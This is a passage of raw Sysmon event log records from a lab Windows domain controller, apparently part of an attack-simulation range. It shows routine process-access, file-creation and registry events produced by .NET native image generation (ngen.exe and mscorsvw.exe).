xe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:30.796{59A5CD1D-9172-6005-7F02-00000000A301}2960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\b90-0\System.IdentityModel.Selectors.dll2021-01-18 13:47:30.796 10341000x80000000000000006697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:30.656{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9172-6005-7F02-00000000A301}2960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:30.640{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9172-6005-7F02-00000000A301}2960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:30.640{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9172-6005-7F02-00000000A301}2960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:30.593{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9172-6005-7E02-00000000A301}4788C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:30.578{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9172-6005-7E02-00000000A301}4788C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:30.578{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9172-6005-7E02-00000000A301}4788C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:30.453{59A5CD1D-9170-6005-7D02-00000000A301}2256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\8d0-0\System.IdentityModel.dll2021-01-18 13:47:30.453 10341000x80000000000000006712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:31.937{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9173-6005-8302-00000000A301}4416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:31.937{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9173-6005-8302-00000000A301}4416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:31.937{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9173-6005-8302-00000000A301}4416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:31.890{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9173-6005-8202-00000000A301}4764C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:31.874{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9173-6005-8202-00000000A301}4764C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:31.874{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9173-6005-8202-00000000A301}4764C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:31.812{59A5CD1D-9173-6005-8102-00000000A301}4860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12fc-0\System.IdentityModel.Services.dll2021-01-18 13:47:31.812 13241300x80000000000000006705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:47:31.609{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6eda0-0x77e59401) 10341000x80000000000000006704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:31.312{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9173-6005-8102-00000000A301}4860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:31.281{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9173-6005-8102-00000000A301}4860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:31.281{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9173-6005-8102-00000000A301}4860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:32.749{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9174-6005-8802-00000000A301}3232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:32.734{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9174-6005-8802-00000000A301}3232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:32.734{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9174-6005-8802-00000000A301}3232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:32.671{59A5CD1D-9174-6005-8702-00000000A301}3448C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\d78-0\System.IO.Log.dll2021-01-18 13:47:32.671 10341000x80000000000000006726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:32.343{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9174-6005-8702-00000000A301}3448C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:32.343{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9174-6005-8702-00000000A301}3448C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:32.343{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9174-6005-8702-00000000A301}3448C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:32.281{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9174-6005-8602-00000000A301}4040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:32.281{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9174-6005-8602-00000000A301}4040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:32.281{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9174-6005-8602-00000000A301}4040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\